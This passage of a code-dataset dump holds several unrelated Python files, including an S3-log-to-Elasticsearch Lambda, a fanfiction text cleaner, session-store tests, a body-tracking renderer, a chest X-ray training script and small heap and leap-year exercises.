r'(\\S+) (\\S+) (\\S+) (\\S+) (\\S+) (\\S+) ' \\\n r'\"([^\"]+)\" \"([^\"]+)\" (\\S+)'\n\nFMT_IN = '%d/%b/%Y:%H:%M:%S'\nFMT_OUT = '%Y-%m-%dT%H:%M:%S'\n\n#################################################\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\nR = re.compile(S3_REGEX)\nINDEX = INDEX_PREFIX + \"-\" + datetime.strftime(datetime.now(), \"%Y.%m.%d\")\nTYPE = 'S3'\n\n\ndef lambda_handler(event, context):\n bucket = event[\"Records\"][0][\"s3\"][\"bucket\"][\"name\"]\n key = event[\"Records\"][0][\"s3\"][\"object\"][\"key\"]\n logger.debug('Got event{} for key {}'.format(json.dumps(event, indent=2), str(key)))\n\n try:\n logger.info('Get the s3 object: 
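The myself_adaboost.py record above carries two shape traps: `buildStump` compares the m-by-1 prediction vector against the un-transposed 1-by-m label matrix, and `adaBoostTrainDS` calls `.T` on `classLabels`, which fails when a plain list is passed. A hedged sketch of the intended re-weighting step using 1-D arrays, which sidesteps the np.mat orientation issues entirely (the function name is illustrative):

```python
import numpy as np

def adaboost_round(pred, labels, D):
    """One AdaBoost re-weighting step; pred and labels are 1-D arrays of +/-1."""
    eps = np.dot(D, pred != labels)                    # weighted error of the stump
    alpha = 0.5 * np.log((1 - eps) / max(eps, 1e-16))  # stump's vote weight
    D = D * np.exp(-alpha * labels * pred)             # shrink correct, grow wrong
    return alpha, D / D.sum()                          # renormalise to a distribution

labels = np.array([1, 1, -1, -1])
pred = np.array([1, -1, -1, -1])   # the stump misclassifies sample 2
D = np.full(4, 0.25)
alpha, D = adaboost_round(pred, labels, D)
print(alpha)  # ~0.549 = 0.5 * ln(0.75 / 0.25)
print(D)      # the misclassified sample's weight grows to 0.5
```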
{}'.format(str(key)))\n s3 = boto3.client(\"s3\")\n obj = s3.get_object(\n Bucket=bucket,\n Key=key\n )\n except Botoxeption.ClientError as e:\n logger.error('something got wrong: {}'.format(str(e)))\n\n logger.info('extract body')\n body = obj[\"Body\"].read()\n data = \"\"\n\n for line in body.strip().split(\"\\n\"):\n match = R.match(line)\n if not match:\n logger.error('no match for: {}'.format(str(line)))\n continue\n\n values = match.groups(0)\n doc = dict(zip(S3_KEYS, values))\n\n doc[S3_KEYS[2]] = transform_timestamp(doc[S3_KEYS[2]])\n\n # to avoid any type parsing errors for number fields in ES, let's change '-' to 0\n for key, value in doc.iteritems():\n if key in [\"bytes_send\", \"object_size\", \"total_time\", \"turn_around_time\"]:\n if value == '-':\n logger.debug('Found \\'-\\' for key: {}, replacing with 0'.format(key))\n doc[key] = '0'\n\n data += '{\"index\":{\"_index\":\"' + INDEX + '\",\"_type\":\"' + TYPE + '\"}}\\n'\n data += json.dumps(doc) + \"\\n\"\n logger.debug('a json doc in all its glory: {}'.format(str(json.dumps(doc))))\n\n if len(data) > 1000000:\n _bulk(ES_HOST, data)\n data = \"\"\n\n if data:\n _bulk(ES_HOST, data)\n\n\ndef _bulk(host, doc):\n credentials = _get_credentials()\n url = _create_url(host, \"/_bulk\")\n response = es_request(url, \"POST\", credentials, data=doc)\n logger.info('ingest to es: {}'.format(str(response.text)))\n if not response.ok:\n logger.error('Response Error: {}'.format(str(response.text)))\n\n\ndef transform_timestamp(timestamp):\n d = datetime.strptime(timestamp, FMT_IN)\n return date.strftime(d, FMT_OUT)\n\n\ndef _get_credentials():\n return Credentials(\n os.environ[\"AWS_ACCESS_KEY_ID\"],\n os.environ[\"AWS_SECRET_ACCESS_KEY\"],\n os.environ[\"AWS_SESSION_TOKEN\"])\n\n\ndef _create_url(host, path, ssl=False):\n if not path.startswith(\"/\"):\n path = \"/\" + path\n\n if ssl:\n return \"https://\" + host + path\n else:\n return \"http://\" + host + path\n\n\ndef request(url, method, credentials, service_name, region=None, headers=None, data=None):\n if not region:\n region = os.environ[\"AWS_REGION\"]\n\n aws_request = AWSRequest(url=url, method=method, headers=headers, data=data)\n SigV4Auth(credentials, service_name, region).add_auth(aws_request)\n return PreserveAuthSession().send(aws_request.prepare())\n\n\ndef es_request(url, method, credentials, region=None, headers=None, data=None):\n return request(url, method, credentials, \"es\", region, headers, data)\n","sub_path":"lambda/s3_to_es/s3_to_es.py","file_name":"s3_to_es.py","file_ext":"py","file_size_in_byte":4388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100362840","text":"\"\"\"\nScript to clean the PAN20 Fanfiction dataset.\nExecutes the following steps:\n - Remove tokens longer than 23 characters\n - Remove tokens with 3 or more punctuation symbols (37510 types)\n - Remove tokens containing symbols that are not in transcribable_ff or punctuation\n - Replace \" with ' (\" does not transcribe, ' does)\n - Remove excessively long or short texts\nPersists the cleaned dataset to a new folder also containing a corrected truth file.\n\"\"\"\nfrom string import punctuation\nimport re\n\nimport spacy\n\n# Contains lowercase characters that g2p_en can transcribe directly\ntranscribable_ff_lowercase = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h',\n 'i', 'j',\n 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z', 'à', 'á',\n 'â', 'ã',\n 'ä', 
'å', 'ç', 'è', 'é', 'ê', 'ë', 'ì', 'í', 'î', 'ï', 'ñ', 'ò', 'ó', 'ô', 'õ', 'ö', 'ù',\n 'ú', 'û',\n 'ü', 'ý', 'ÿ', 'ā', 'ă', 'ą', 'ć', 'ĉ', 'č', 'ď', 'ē', 'ĕ', 'ė', 'ę', 'ě', 'ĝ', 'ğ', 'ġ',\n 'ĥ', 'ī',\n 'ĭ', 'į', 'ĺ', 'ļ', 'ľ', 'ń', 'ņ', 'ň', 'ō', 'ŏ', 'ő', 'ŕ', 'ŗ', 'ř', 'ś', 'ŝ', 'ş', 'š',\n 'ţ', 'ť',\n 'ũ', 'ū', 'ŭ', 'ů', 'ű', 'ų', 'ŵ', 'ŷ', 'ź', 'ż', 'ž', 'ơ', 'ư', 'ǎ', 'ǐ', 'ǒ', 'ǔ', 'ǘ',\n 'ǧ', 'ǫ',\n 'ǵ', 'ǹ', 'ǻ', 'ȁ', 'ȅ', 'ȇ', 'ȉ', 'ȋ', 'ȍ', 'ȏ', 'ȓ', 'ș', 'ț', 'ȟ', 'ȧ', 'ȩ', 'ȫ', 'ȯ',\n 'ȳ', 'ḁ',\n 'ḋ', 'ḍ', 'ḑ', 'ḓ', 'ḙ', 'ḛ', 'ḣ', 'ḥ', 'ḧ', 'ḩ', 'ḫ', 'ḭ', 'ḯ', 'ḷ', 'ḻ', 'ḽ', 'ḿ', 'ṁ',\n 'ṃ', 'ṅ',\n 'ṇ', 'ṛ', 'ṟ', 'ṡ', 'ṣ', 'ṩ', 'ṫ', 'ṭ', 'ṯ', 'ṱ', 'ṳ', 'ṷ', 'ṻ', 'ṽ', 'ṿ', 'ẁ', 'ẃ', 'ẇ',\n 'ẍ', 'ẖ',\n 'ẗ', 'ẘ', 'ạ', 'ầ', 'ậ', 'ẹ', 'ẻ', 'ẽ', 'ế', 'ị', 'ọ', 'ỏ', 'ộ', 'ớ', 'ờ', 'ở', 'ủ', 'ỳ',\n 'ỵ', 'ỷ']\ntranscribable = transcribable_ff_lowercase + list(punctuation)\n\nnlp = spacy.load('en_core_web_sm', exclude=['parser', 'ner'])\n\n\ndef clean(doc):\n return ''.join([x.text_with_ws for x in doc if clean_cond(x)])\n\n\ndef clean_cond(token):\n return all(c in transcribable for c in token.text.lower()) and len(token.text) <= 23 and len([c for c in token.text if c in punctuation]) <= 2\n\n\ndef replace_special(text):\n return text.replace('\"', \"'\").replace('...', '. ')\n\n\ndef main():\n pass\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"clean_ff.py","file_name":"clean_ff.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"157582585","text":"import json\nfrom datetime import datetime, timedelta\n\nfrom flask import current_app\nfrom jwcrypto import jwe\nfrom jwcrypto.common import base64url_encode\n\nfrom app.data_models.app_models import EQSession\nfrom app.data_models.session_data import SessionData\nfrom app.data_models.session_store import SessionStore\nfrom app.storage import storage_encryption\nfrom app.utilities.json import json_dumps\nfrom tests.app.app_context_test_case import AppContextTestCase\n\n\nclass SessionStoreTest(AppContextTestCase):\n def setUp(self):\n super().setUp()\n self._app.permanent_session_lifetime = timedelta(seconds=1)\n self.session_store = SessionStore(\"user_ik\", \"pepper\")\n self.expires_at = datetime.utcnow() + timedelta(seconds=3)\n self.session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n\n def test_no_session(self):\n with self._app.test_request_context():\n self.assertIsNone(self.session_store.user_id)\n self.assertIsNone(self.session_store.session_data)\n\n def test_create(self):\n with self._app.test_request_context():\n self.session_store.create(\n \"eq_session_id\", \"test\", self.session_data, self.expires_at\n )\n self.assertEqual(\"eq_session_id\", self.session_store.eq_session_id)\n self.assertEqual(\"test\", self.session_store.user_id)\n self.assertEqual(self.session_data, self.session_store.session_data)\n\n def test_save(self):\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n self.assertEqual(session_store.session_data.tx_id, \"tx_id\")\n\n def test_delete(self):\n with 
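The clean_ff.py record rebuilds the cleaned text from `token.text_with_ws`, which preserves each surviving token's trailing whitespace so no re-joining logic is needed. A small illustration using the record's length and punctuation thresholds but without its transcribable-character table, and assuming the en_core_web_sm model is installed, as the record itself does:

```python
from string import punctuation

import spacy

nlp = spacy.load("en_core_web_sm", exclude=["parser", "ner"])

def clean_cond(token):
    # Same thresholds as the record: at most 23 characters and
    # no more than 2 punctuation marks per token.
    return len(token.text) <= 23 and sum(c in punctuation for c in token.text) <= 2

doc = nlp("The fic's title was Supercalifragilisticexpialidocious, sadly.")
cleaned = "".join(tok.text_with_ws for tok in doc if clean_cond(tok))
print(cleaned)  # the 34-character token is dropped; the rest keeps its spacing
```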
self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n self.assertEqual(\"test\", self.session_store.user_id)\n self.session_store.delete()\n self.assertEqual(self.session_store.user_id, None)\n\n def test_add_data_to_session(self):\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n current_time = datetime.utcnow().isoformat()\n self.session_store.session_data.submitted_time = current_time\n self.session_store.save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n self.assertEqual(session_store.session_data.submitted_time, current_time)\n\n def test_should_not_delete_when_no_session(self):\n with self.app_request_context(\"/status\") as context:\n\n # Call clear with a valid user_id but no session in database\n self.session_store.delete()\n\n # No database calls should have been made\n self.assertEqual(context.app.eq[\"storage\"].client.delete_call_count, 0)\n\n def test_session_store_ignores_new_values_in_session_data(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n\n session_data.additional_value = \"some cool new value you do not know about yet\"\n\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=self.session_data,\n expires_at=self.expires_at,\n ).save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertFalse(hasattr(session_store.session_data, \"additional_value\"))\n\n def test_session_store_ignores_multiple_new_values_in_session_data(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n\n session_data.additional_value = \"some cool new value you do not know about yet\"\n session_data.second_additional_value = \"some other not so cool value\"\n\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=session_data,\n expires_at=self.expires_at,\n ).save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertFalse(hasattr(session_store.session_data, \"additional_value\"))\n self.assertFalse(\n hasattr(session_store.session_data, \"second_additional_value\")\n )\n\n def test_session_store_stores_trading_as_value_if_present(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n trad_as=\"trading_as\",\n case_id=\"case_id\",\n )\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=session_data,\n expires_at=self.expires_at,\n ).save()\n\n 
session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertTrue(hasattr(session_store.session_data, \"trad_as\"))\n\n def test_session_store_stores_none_for_trading_as_if_not_present(self):\n session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n ru_ref=\"ru_ref\",\n response_id=\"response_id\",\n case_id=\"case_id\",\n )\n with self._app.test_request_context():\n self.session_store.create(\n eq_session_id=\"eq_session_id\",\n user_id=\"test\",\n session_data=session_data,\n expires_at=self.expires_at,\n ).save()\n\n session_store = SessionStore(\"user_ik\", \"pepper\", \"eq_session_id\")\n\n self.assertIsNone(session_store.session_data.trad_as)\n\n\nclass TestSessionStoreEncoding(AppContextTestCase):\n \"\"\"Session data used to be base64-encoded. For performance reasons the\n base64 encoding was removed.\n \"\"\"\n\n def setUp(self):\n super().setUp()\n self.user_id = \"user_id\"\n self.user_ik = \"user_ik\"\n self.pepper = \"pepper\"\n self.session_id = \"session_id\"\n self.expires_at = datetime.utcnow() + timedelta(seconds=3)\n self.session_data = SessionData(\n tx_id=\"tx_id\",\n schema_name=\"some_schema_name\",\n period_str=\"period_str\",\n language_code=None,\n launch_language_code=None,\n survey_url=None,\n ru_name=\"ru_name\",\n response_id=\"response_id\",\n ru_ref=\"ru_ref\",\n trad_as=\"trading_as_name\",\n case_id=\"case_id\",\n )\n\n # pylint: disable=protected-access\n self.key = storage_encryption.StorageEncryption._generate_key(\n self.user_id, self.user_ik, self.pepper\n )\n\n def test_legacy_load(self):\n self._save_session(\n self.session_id, self.user_id, self.session_data, legacy=True\n )\n session_store = SessionStore(self.user_ik, self.pepper, self.session_id)\n self.assertEqual(session_store.session_data.tx_id, self.session_data.tx_id)\n\n def test_load(self):\n self._save_session(self.session_id, self.user_id, self.session_data)\n session_store = SessionStore(self.user_ik, self.pepper, self.session_id)\n self.assertEqual(session_store.session_data.tx_id, self.session_data.tx_id)\n\n def _save_session(self, session_id, user_id, data, legacy=False):\n raw_data = json_dumps(vars(data))\n protected_header = {\"alg\": \"dir\", \"enc\": \"A256GCM\", \"kid\": \"1,1\"}\n\n if legacy:\n plaintext = base64url_encode(raw_data)\n else:\n plaintext = raw_data\n\n jwe_token = jwe.JWE(\n plaintext=plaintext, protected=protected_header, recipient=self.key\n )\n\n session_model = EQSession(\n eq_session_id=session_id,\n user_id=user_id,\n session_data=jwe_token.serialize(compact=True),\n expires_at=self.expires_at,\n )\n current_app.eq[\"storage\"].put(session_model)\n","sub_path":"tests/app/data_model/test_session_store.py","file_name":"test_session_store.py","file_ext":"py","file_size_in_byte":9995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323409881","text":"import cv2\nimport numpy as np\n\nfrom cv_viewer.utils import *\nimport pyzed.sl as sl\n\n#----------------------------------------------------------------------\n# 2D VIEW\n#----------------------------------------------------------------------\ndef cvt(pt, scale):\n '''\n Function that scales point coordinates\n '''\n out = [pt[0]*scale[0], pt[1]*scale[1]]\n return out\n\ndef render_2D(left_display, img_scale, objects, is_tracking_on):\n '''\n Parameters\n left_display (np.array): 
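The tests above exercise both session encodings: legacy records base64url-encode the JSON before JWE encryption, newer ones encrypt it directly. A standalone sketch of that round trip with jwcrypto, using a freshly generated symmetric key in place of the app's derived storage key:

```python
from jwcrypto import jwe, jwk
from jwcrypto.common import base64url_encode, base64url_decode

key = jwk.JWK.generate(kty="oct", size=256)  # stand-in for the derived key
protected = {"alg": "dir", "enc": "A256GCM", "kid": "1,1"}

raw = '{"tx_id": "tx_id"}'

# Legacy writers base64url-encoded the JSON before encrypting ...
legacy = jwe.JWE(plaintext=base64url_encode(raw), protected=protected, recipient=key)
# ... newer writers encrypt the JSON directly.
plain = jwe.JWE(plaintext=raw, protected=protected, recipient=key)

for serialized, is_legacy in [(legacy.serialize(compact=True), True),
                              (plain.serialize(compact=True), False)]:
    token = jwe.JWE()
    token.deserialize(serialized, key=key)   # decrypts when the key is supplied
    payload = token.payload
    if is_legacy:
        payload = base64url_decode(payload.decode())
    print(payload)  # b'{"tx_id": "tx_id"}' in both cases
```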
numpy array containing image data\n img_scale (list[float])\n objects (list[sl.ObjectData]) \n '''\n overlay = left_display.copy()\n\n # Render skeleton joints and bones\n for obj in objects:\n if render_object(obj, is_tracking_on):\n if len(obj.keypoint_2d) > 0:\n color = generate_color_id_u(obj.id)\n # Draw skeleton bones\n for part in SKELETON_BONES:\n kp_a = cvt(obj.keypoint_2d[part[0].value], img_scale)\n kp_b = cvt(obj.keypoint_2d[part[1].value], img_scale)\n # Check that the keypoints are inside the image\n if(kp_a[0] < left_display.shape[1] and kp_a[1] < left_display.shape[0] \n and kp_b[0] < left_display.shape[1] and kp_b[1] < left_display.shape[0]\n and kp_a[0] > 0 and kp_a[1] > 0 and kp_b[0] > 0 and kp_b[1] > 0 ):\n cv2.line(left_display, (int(kp_a[0]), int(kp_a[1])), (int(kp_b[0]), int(kp_b[1])), color, 1, cv2.LINE_AA)\n \n # Get spine base coordinates to create backbone\n left_hip = obj.keypoint_2d[sl.BODY_PARTS.LEFT_HIP.value]\n right_hip = obj.keypoint_2d[sl.BODY_PARTS.RIGHT_HIP.value]\n spine = (left_hip + right_hip) / 2\n kp_spine = cvt(spine, img_scale)\n kp_neck = cvt(obj.keypoint_2d[sl.BODY_PARTS.NECK.value], img_scale)\n # Check that the keypoints are inside the image\n if(kp_spine[0] < left_display.shape[1] and kp_spine[1] < left_display.shape[0] \n and kp_neck[0] < left_display.shape[1] and kp_neck[1] < left_display.shape[0]\n and kp_spine[0] > 0 and kp_spine[1] > 0 and kp_neck[0] > 0 and kp_neck[1] > 0\n and left_hip[0] > 0 and left_hip[1] > 0 and right_hip[0] > 0 and right_hip[1] > 0 ):\n cv2.line(left_display, (int(kp_spine[0]), int(kp_spine[1])), (int(kp_neck[0]), int(kp_neck[1])), color, 1, cv2.LINE_AA)\n\n # Skeleton joints\n for kp in obj.keypoint_2d:\n cv_kp = cvt(kp, img_scale)\n if(cv_kp[0] < left_display.shape[1] and cv_kp[1] < left_display.shape[0]):\n cv2.circle(left_display, (int(cv_kp[0]), int(cv_kp[1])), 3, color, -1)\n if(kp_spine[0] < left_display.shape[1] and kp_spine[1] < left_display.shape[0]\n and left_hip[0] > 0 and left_hip[1] > 0 and right_hip[0] > 0 and right_hip[1] > 0 ):\n cv2.circle(left_display, (int(kp_spine[0]), int(kp_spine[1])), 3, color, -1)\n \n cv2.addWeighted(left_display, 0.9, overlay, 0.1, 0.0, left_display)","sub_path":"body tracking/python/cv_viewer/tracking_viewer.py","file_name":"tracking_viewer.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601163913","text":"def is_leap(year):\n if year % 4 == 0:\n if year % 100 == 0:\n if year % 400 == 0:\n print(\"Leap year.\")\n return True\n else:\n print(\"Not leap year.\")\n return False\n else:\n print(\"Leap year.\")\n return True\n else:\n print(\"Not leap year.\")\n return False\n\ndef days_in_month(year, month):\n month_days = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n leap_year = is_leap(year)\n if month == 2:\n if leap_year == True:\n return month_days[month-1]+1\n return month_days[month-1] \n \n \n \n#🚨 Do NOT change any of the code below \nyear = int(input(\"Enter a year: \"))\nmonth = int(input(\"Enter a month: \"))\ndays = days_in_month(year, month)\nprint(days)\n\n","sub_path":"is_leap_year.py","file_name":"is_leap_year.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"68136694","text":"#! 
/usr/bin/env python\n#coding=utf-8\n\nfrom apis.contact.department.depmanagment import DeptManagment\n\nclass TestCreateDep:\n\n def test_create_new_dep(self):\n dept_managment = DeptManagment()\n dept_managment.create_dept()\n create_res = dept_managment.get_response()\n assert create_res.get('errmsg')=='created'","sub_path":"qiyeweixin/src/testcases/contact/department/test_create_dep.py","file_name":"test_create_dep.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"639637988","text":"import os\nimport time\nimport argparse\nimport numpy as np\n\nlistdir = os.getcwd()\nos.chdir(os.path.dirname(listdir))\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\n\nfrom tensorboardX import SummaryWriter\nfrom sklearn.metrics import roc_auc_score\nfrom chestx.models import densenet121_chest\nfrom chestx.nih import ChestXrayDataSet\nfrom chestx.loss import FocalLoss, MultiLabelBCELoss\n\nparser = argparse.ArgumentParser(description='Chest-Xray Training')\nparser.add_argument('--data_path', type=str,\n default='./CVPR19/',\n help='folder to load labels and images')\nparser.add_argument('--save_path', type=str,\n default='./chestx/logs4/',\n help='folder to save output images and model checkpoints')\nparser.add_argument('--image_size', type=int,\n default=512,\n help='image size (default: 512)')\nparser.add_argument('--lr', '--learning_rate', type=float,\n default=1e-2,\n help='initial learning rate (default: 0.01)')\nparser.add_argument('--lrp', type=float,\n default=0.1,\n help='learning rate for pre-trained layers (default: 0.1)')\nparser.add_argument('--momentum', type=float,\n default=0.9,\n help='momentum (default: 0.9)')\nparser.add_argument('--epochs', type=int,\n default=40,\n help='umber of total epochs to run')\nparser.add_argument('--batch_size', type=int,\n default=15,\n help='batch size for training model')\nparser.add_argument('--test_batch_size', type=int,\n default=3,\n help='batch size for testing model')\nparser.add_argument('--weight-decay', type=float,\n default=1e-4,\n help='weight decay (default: 1e-5)')\nparser.add_argument('--num_classes', type=int,\n default=14,\n help='The numbers of classes')\nparser.add_argument('--normalize_mean', type=tuple,\n default=(0.5, 0.5, 0.5),\n help='mean value for image normalization')\nparser.add_argument('--normalize_var', type=tuple,\n default=(0.5, 0.5, 0.5),\n help='variance value for image normalization')\nparser.add_argument('--classes', type=tuple,\n default=('Atelectasis', 'Cardiomegaly', 'Effusion', 'Infiltration', 'Mass', 'Nodule', 'Pneumonia',\n 'Pneumothorax', 'Consolidation', 'Edema', 'Emphysema', 'Fibrosis', 'Pleural_Thickening', 'Hernia'),\n help='labels of Chest-Xray')\nargs = parser.parse_args()\n\n# Define to use GPU0\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n\ndef compute_AUCs(gt_np, pred_np):\n AUROCs = []\n for i in range(args.num_classes):\n AUROCs.append(roc_auc_score(gt_np[:, i], pred_np[:, i]))\n return AUROCs\n\ndef main_chest():\n print('222')\n # Preparing for Dataset\n transform_train = transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.RandomCrop(448),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(args.normalize_mean, args.normalize_var)\n ])\n\n transform_test = transforms.Compose([\n transforms.Resize(args.image_size),\n transforms.FiveCrop(448),\n 
transforms.Lambda(lambda crops: torch.stack([transforms.ToTensor()(crop) for crop in crops])),\n # transforms.Normalize(args.normalize_mean, args.normalize_var),\n transforms.Lambda(lambda crops: torch.stack([\n transforms.Normalize(args.normalize_mean, args.normalize_var)(crop) for crop in crops])),\n ])\n\n print('Preparing training set...')\n trainset = ChestXrayDataSet(root=args.data_path, set=\"train\", transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size,\n shuffle=True, num_workers=2)\n trainloader2 = torch.utils.data.DataLoader(trainset, batch_size=args.batch_size,\n shuffle=True, num_workers=2)\n\n print('Preparing testing set...')\n testset = ChestXrayDataSet(root=args.data_path, set=\"test\", transform=transform_test)\n testloader = torch.utils.data.DataLoader(testset, batch_size=args.test_batch_size,\n shuffle=False, num_workers=2)\n print('Dataset loading is done!')\n\n # Define Chest-Xray model\n net = densenet121_chest(num_classes=args.num_classes, kmax=5, kmin=5, alpha=0.7).to(device)\n\n # Define Loss function and Optimizer\n criterion = MultiLabelBCELoss()\n #criterion = FocalLoss()\n criterion = criterion.to(device)\n optimizer = torch.optim.SGD(net.parameters(),\n lr=args.lr,\n momentum=args.momentum,\n weight_decay=args.weight_decay)\n scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[9, 12, 15], gamma=0.1)\n # scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.1)\n\n state = {'train_time':time.time(), 'test_time':time.time(), 'step':0,\n 'learning_rate':scheduler.get_lr()[0], 'sum_loss':0.,}\n writer = SummaryWriter(args.save_path)\n # net.load_state_dict(torch.load('./chestx/logs5/model_1.pth'))\n\n # Training\n print(\"Staring Training ...\")\n for epoch in range(1, args.epochs + 1):\n # if epoch >= 5:\n scheduler.step()\n for i, (inputs, labels) in enumerate(trainloader, 0):\n net.train()\n length = len(trainloader)\n inputs, labels = inputs.to(device), labels.to(device)\n optimizer.zero_grad()\n\n outputs = net(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n state['sum_loss'] += loss.data.item()\n state['step'] += 1\n if (i + 1) % 10 == 0:\n writer.add_scalar('Loss', loss.data.item(), (i + 1 + epoch * length))\n if (i + 1) % 1000 == 0:\n state['learning_rate'] = np.log10(1 / scheduler.get_lr()[0]).astype(int)\n print('[epoch : {}, iter : {}, lr : 1e-{}] Loss: {:.3f} Cost Time : {:.2f}'.format(\n epoch, (i + 1 + (epoch - 1) * length), state['learning_rate'],\n state['sum_loss'] / state['step'], time.time() - state['train_time']))\n state['sum_loss'], state['step'], state['train_time'] = 0., 0, time.time()\n\n print(\"Waiting for Test...\")\n state['test_time'] = time.time()\n with torch.no_grad():\n gt, pred = torch.FloatTensor(), torch.FloatTensor()\n for (inputs, labels) in testloader:\n inputs = inputs.view([args.test_batch_size * 5, 3, 448, 448])\n\n net.eval()\n gt = torch.cat((gt, labels), 0)\n inputs = inputs.to(device)\n outputs = net(inputs)\n outputs = outputs.view([args.test_batch_size, 5, args.num_classes]).max(dim=1)[0]\n pred = torch.cat((pred, outputs.cpu()), 0)\n\n gt_npy = gt.cpu().numpy()\n pred_npy = pred.cpu().numpy()\n AUROCs = compute_AUCs(gt_npy, pred_npy)\n AUROC_avg = np.array(AUROCs).mean()\n print('The average AUROC is {AUROC_avg:.4f}'.format(AUROC_avg=AUROC_avg))\n for idx in range(args.num_classes):\n print('The AUROC of {} is {}'.format(args.classes[idx], AUROCs[idx]))\n print('Testing cost time : 
{:.2f}'.format(time.time() - state['test_time']))\n state['train_time'] = state['test_time'] = time.time()\n\n writer.add_scalar('AUROC', AUROC_avg, epoch)\n\n print(\"Saving model...\")\n torch.save(net.state_dict(), '{}/model_{}.pth'.format(args.save_path, epoch))\n\n\nif __name__ == '__main__':\n main_chest()","sub_path":"demo_chest.py","file_name":"demo_chest.py","file_ext":"py","file_size_in_byte":8129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119655059","text":"import random\nimport time\nimport datetime\n\ndef data_source():\n while True:\n yield random.randint(0, 100)\n time.sleep(0.1)\n\ndef top_k1(k, time=3):\n start = datetime.datetime.now()\n lst = []\n ds = data_source()\n while True:\n lst.append(next(ds))\n current = datetime.datetime.now()\n if (current - start).total_seconds() >= time:\n start = current\n lst.sort()\n ret = []\n for _ in range(k):\n ret.append(lst.pop())\n yield ret\n\ndef top_k2(k, time=3):\n start = datetime.datetime.now()\n lst = []\n ds = data_source()\n while True:\n #lst.append(next(ds))\n e = next(ds)\n for i, v in enumerate(lst):\n if e < v:\n lst.insert(i, e)\n break\n else:\n lst.append(e)\n current = datetime.datetime.now()\n if (current - start).total_seconds() >= time:\n start = current\n #lst.sort()\n ret = []\n for _ in range(k):\n ret.append(lst.pop())\n yield ret\n\n\ndef heap():\n data = []\n\n def add(e):\n idx = len(data)\n data.append(e)\n parent_idx = (idx - 1) // 2\n while parent_idx >= 0:\n if data[idx] > data[parent_idx]:\n data[parent_idx], data[idx] = data[idx], data[parent_idx]\n idx = parent_idx\n parent_idx = (idx - 1) // 2\n else:\n break\n\n def pop():\n if not data:\n return None\n if len(data) == 1:\n return data.pop()\n idx = 0\n ret = data[idx]\n data[idx] = data.pop()\n left_idx = 2 * idx + 1\n rigth_idx = 